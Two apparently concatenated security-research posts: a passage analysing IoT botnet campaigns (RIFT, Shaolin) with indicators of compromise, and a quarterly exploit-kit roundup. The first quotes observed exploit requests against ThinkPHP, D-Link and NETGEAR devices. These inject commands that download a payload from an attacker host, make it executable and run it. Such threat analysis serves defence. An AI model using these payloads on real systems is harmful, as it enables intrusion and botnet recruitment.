to “/tmp/666trapgod”. Later, it changes the permission of the shell script file to 777 (full permissions), which makes it executable and then runs it from its location in the “/tmp” directory. Fig. 3: Malicious “airlink.sh” shell script The “airlink.sh” (which is stored as “66trapgod”) downloads the final payload from the dropper server “89[.]46[.]223[.]70”. It downloads the payload for all the *INX and other firmware architectures and hopes one of its suits to victim’s architecture and executes it. All the payloads are prefixed with the “rift” string. The targeted architectures are: x86, arm, arm5, arm6, arm7, m68k, mips, mpsl, ppc, ppc-440fp, sh4, spc, x32, x64   Fig. 4: RIFT botnet (rift.x86) packed with UPX packer The static analysis of the unpacked payload reveals its contents. It contains a list of known default usernames and passwords of IoT devices. Fig. 5: Usernames and passwords found in RIFT botnet   Various IoT exploits, a few of which are mentioned in the below screenshot. (Also contains some mentioned in Fig. 2.) Fig. 6: Exploits in the RIFT botnet Using these default credentials and exploits, the infected IoT device infects another device. There is also an interesting reference in the payload that refers to “OrkSec Gang.” Fig. 7: OrkSec Gang reference The following are the user-agents seen in this attack: Dark Rift/2.0 Sefa Shaolin/1.0 Oof ThinkPHP exploitation On December 11, 2018, a remote code execution vulnerability in the ThinkPHP framework was reported. The ThinkPHP is used predominantly in China. We believe ThinkPHP is also being incorporated in upcoming IoT devices for its management plugins. The exploit code is as follows: /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://orksecpatrol[.]xyz/bins/rift.x86;cat%20rift.x86%20>%20gfrihk;chmod%20777%20gfrihk;./gfrihk%20thinkphp;rm%20gfrihk The OS commands are injected through the query parameter “vars”. This follows a typical exploitation sequence observed in RIFT attacks (as explained above). The payload was downloaded from the URL “hxxp://orksecpatrol[.]xyz/bins/rift.x86”, which is similar to what we saw in the case of RIFT. The payload downloaded from the ThinkPHP exploit also was packed with UPX and contains a list of well-known usernames and passwords. Similar exploits were also embedded in the binary that we saw in the RIFT botnet. The notable difference was that this payload now contains the ThinkPHP exploit. It appears that the RIFT attack incorporated this exploit into its arsenal.   Fig. 8: Inclusion of ThinkPHP exploit in RIFT botnet There was one more difference: a couple of vulnerabilities exploited over the UPnP SOAP (CVE-2014-8361) protocol in Realtek SDK Miniigd was using the user-agent string “NotRift/2.0” instead of the previously used user-agent “Rift/2.0” string. Fig. 9: Comparing UPnP exploits observed in RIFT and ThinkPHP payloads It has become evident that the RIFT botnet is also being delivered through the ThinkPHP exploitation. D-Link router exploitation In addition to other targets, we saw major hits related to DLink routers, especially the DSL-2750B model. This model had a Remote Code Execution (RCE) vulnerability that can be exploited with the “cli” parameter (“login.cgi?cli=”). The parameter directly invokes the “ayecli” binary, and arguments to this parameter become the input to binary. Below is the observed exploit code: /login.cgi?cli=aa aa';wget hxxp://89[.]46[.]223[.]70/dlink.sh -O -> /tmp/ff;chmod +x /tmp/ff;sh /tmp/ff'$ The URL downloads a shell script from “hxxp://89[.]46[.]223[.]70” and drops it into “/tmp/” directory with file name “ff”. We noticed that file names were totally random. Later, the file is made executable with the “chmod +x” command and is finally executed. The shell script contains download links of additional payloads for different architectures.   Fig. 10: Malicious “dlink.sh” shell script The task of shell script is to remove all contents from the “/tmp/” directory, download the actual payload, make the payload executable, and finally execute the payload. It tries to download and execute payloads for many *NIX architectures including but not limited to .arm, .arm5, .arm7, .mips, .mpsl, .x86, etc. Once the payload is executed, it deletes all the payloads from the “/tmp/” directory, leaving no trace of the attack. The payload dropped from the exploit was not packed, and a simple static analysis of the file showed reference to another famous UPnP SOAP exploit (CVE-2014-8361) in Realtek SDK Miniigd. This vulnerability affects all the IoT devices embedded with Realtek SDK. This Mirai variant tries to exploit all the other devices with the embedded exploit of Realtek SDK Miniigd. Fig. 11: Realtek SDK Miniigd exploit – CVE-2014-8361 Shaolin botnet (exploitation of NETGEAR vulnerability) In the first week of January 2019, we saw hits targeting NETGEAR routers. In these attacks, an old bug was being used for Remote Code Execution (RCE). NETGEAR DGN2200 and NETGEAR DGN1000 are vulnerable to this bug. We saw similar patterns in the URL below, where attackers were trying to download additional payloads from external locations. The exploit code is as follows: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget hxxp://145[.]239[.]138[.]69/bins/shaolin.mips -O /tmp/netgear;sh netgear&curpath=/&currentsetting.htm=1 The downloaded payload “shaolin.mips” is named “netgear” and is executed directly after download. This payload is similar to what we saw in the Airlink101 SkyIPCam case described earlier and used multiple exploits. We found it to be using the SOAP exploit, which targets DSL modems as shown in the code snippet below: Fig. 12: SOAP exploit targeting DSL modems The payload also tries to exploit the Home Network Administration Protocol (HNAP) in D-Link routers to download additional payloads. The following snippet was fetched from a payload that shows usage of HNAP. Fig. 13: HNAP exploit targeting D-Link routers In addition, we found many embedded usernames and password, similar to what we saw in the AirLink case. Conclusion The IoT space is evolving, and so is the attack surface of these devices. IoT devices need to be patched on a timely basis, which presents a challenge. IoT devices also need to be updated regularly. Even though techniques like brute-force attacks that use default passwords are not new, they remain effective because device passwords tend to go unchanged following installation. By hardening IoT devices and baking security in, many of the attacks we’ve been seeing can be countered. Zscaler detections IoT.Backdoor.RIFT PHP.Exploit.ThinkPHP IoT.Trojan.Mirai.B IoT.Exploit.NetGear Indicators of Compromise (IOCs) orksecpatrol[.]xyz/bins/rift[.]x86 159[.]65[.]247[.]21/airlink[.]sh 89[.]46[.]223[.]70/airlink[.]sh 209[.]141[.]50[.]26/b 209[.]141[.]33[.]119/avtechsh 209[.]141[.]33[.]119/avtechsh 104[.]244[.]76[.]210/avtech 89[.]46[.]223[.]70/tutos[.]sh 89[.]46[.]223[.]70/dlink[.]sh 89[.]46[.]223[.]70/fastgate[.]sh 89[.]46[.]223[.]70/gpon8080[.]sh 89[.]46[.]223[.]70/bins/rift[.]x86 89[.]46[.]223[.]70/bins/rift[.]arm 89[.]46[.]223[.]70/bins/rift[.]arm5 89[.]46[.]223[.]70/bins/rift[.]arm6 89[.]46[.]223[.]70/bins/rift[.]arm7 89[.]46[.]223[.]70/bins/rift[.]m68k 89[.]46[.]223[.]70/bins/rift[.]mips 89[.]46[.]223[.]70/bins/rift[.]mpsl 89[.]46[.]223[.]70/bins/rift[.]ppc 89[.]46[.]223[.]70/bins/rift[.]ppc-440fp 89[.]46[.]223[.]70/bins/rift[.]sh4 89[.]46[.]223[.]70/bins/rift[.]spc 89[.]46[.]223[.]70/bins/rift[.]x32 89[.]46[.]223[.]70/bins/rift[.]x64 89[.]46[.]223[.]70/realtek[.]sh 145[.]239[.]138[.]69/softnas[.]sh 185[.]141[.]24[.]211 103[.]124[.]107[.]121 145[.]239[.]138[.]69 159[.]65[.]247[.]21 167[.]99[.]50[.]62 176[.]32[.]33[.]165 185[.]101[.]105[.]129 185[.]172[.]164[.]41 185[.]244[.]25[.]114 185[.]244[.]25[.]168 185[.]62[.]190[.]191 209[.]97[.]185[.]168 46[.]166[.]185[.]42 50[.]115[.]166[.]136 77[.]87[.]77[.]250  80[.]211[.]112[.]150 145[.]239[.]138[.]69 5e852f314e218842f31f651a2b48559e f5660b1ccad67b08f6ece03c625e469a 82b7d40205994813df63c8a77fbe821c 218205b75d848cca092dcc6742f8b3a9 4471c35a5e68bc248fc8218738aa3e1d 02af7016b49dcbc186d6d5b4ec9beafb 6867dfb692beeff427a3df38938ea96f 963dcfb96774389a4910ea58beb5b2cd dadf1f4ba8089bfd3520318d44fea684 23c2c659e6c07f64903ba071ec2c88d1 6407e1e33853d0e8f4fcc94085581d20 8fcc9ac9b405bd444f156e6b56340486 e753ca95633c4eb4477151cb9a940316 4cea779c2fa89504f4813cbd39f678fa e65e3b21878cc9ef2811a5e38e79a700  

This is the ninth in a series of quarterly roundups by Zscaler ThreatLabZ researchers, in which the team collects and analyzes the recent activity of current exploit kits. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.   RIG EK RIG EK has been the most active exploit kit in the past, but its activity has decreased in comparison to previous quarters. We saw various payloads delivered by RIG EK, from ransomware to banking Trojans. The graph below shows the hits representing RIG EK activity. Figure 1: RIG EK hits from 15th October 2018 to 15th January 2019 The geographic distribution for RIG EK hits is shown below. Figure 2: RIG EK heat map shows showing infected regions One instance of the RIG EK cycle is shown in the figure below. Figure 3: RIG EK infection cycle The obfuscated JavaScript on the landing page can be seen below. Figure 4: RIG EK landing page, obfuscated JavaScript We observed the use of CVE-2018-8174, which targets a VBScript engine to attack the victim's machine. A Flash-based exploit, CVE-2018-4878, was also used, affecting Adobe Flash version 28.0.0.137 and earlier versions. Decompiling the Flash file, we can see the CVE-2018-4878 code, shown below. Figure 5: Decompiled Flash exploit in the current RIG EK cycle; CVE-2018-4878 We can see that the threat actors have tried to mask the function names, which were visible last quarter, as shown in the screen below. Figure 6: Decompiled Flash exploit in previous quarter RIG EK cycle; CVE-2018-4878 Different payloads were observed during the quarter, with GrandCrab ransomware being served at the start of the quarter and Trojans being served towards the end.   GrandSoft EK GrandSoft EK is an old exploit kit that has been showing some recent activity. This EK is being served through malvertisement redirects. Figure 7: GrandSoft EK hits from 15th October 2018 to 15th January 2019 The geographical distribution of GrandSoft hits can be seen below. Figure 8: GrandSoft EK heat map shows infected regions, primarily in Asia The threat actors make small changes to the URL pattern as shown in the image below. Figure 9: GrandSoft EK Cycle with URL "getversionpd"   Figure 10: GrandSoft EK cycle with the URL "getversoinpd"   We saw no changes in the landing page, and we saw that the CVE-2016-0189 VBScript memory corruption vulnerability was still being used to exploit the victim. A snippet of the GrandSoft EK landing page is shown below. Figure 11: GrandSoft EK landing page The payloads we observed included a password stealer and Trojan malware, including Azorult, which differed from the GrandCrab ransomware we saw in previous quarters.   Fallout EK Fallout EK is relatively new, showing activity since early last quarter. The EK redirects victims using multiple HTTP 302 redirects and then sends the user to the Fallout EK landing page. Users are mainly targeted by malvertisement campaigns.   Figure 12: Fallout EK hits from 15th October 2018 to 15th January 2019 The geographic distribution for the Fallout EK is shown below. Figure 13: Fallout EK heat map shows infected regions We can see one instance of a Fallout EK chain in the figure below. Figure 14: Fallout EK infection cycle We can see the initial HTTP 302 redirects from 185.231.69[.]225 and 51.15.98[.]59, which leads to the Fallout EK landing page. The screenshot of the obfuscated landing page is shown below. Figure 15: Fallout EK landing page  The payload seen with the Fallout EK was GrandCrab ransomware. Figure 16: GrandCrab ransomware infection through Fallout EK   Other exploit kits We observed Magnitude EK activity in Southeast Asia, but other exploit kits like Terror EK, Disdain EK, and Kaixin EK are no longer showing any activity. Underminer EK is another exploit kit seen in past quarters, but we have not seen a full cycle for it in the current quarter.   Conclusion Exploit kits can infect a victim's machine during web browsing without the user’s knowledge. The attackers monetize successful infections by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing Trojans to steal a victim’s identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit code into their EK, and security researchers analyze and block the new threats by tracking changes in the EK behavior.  To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.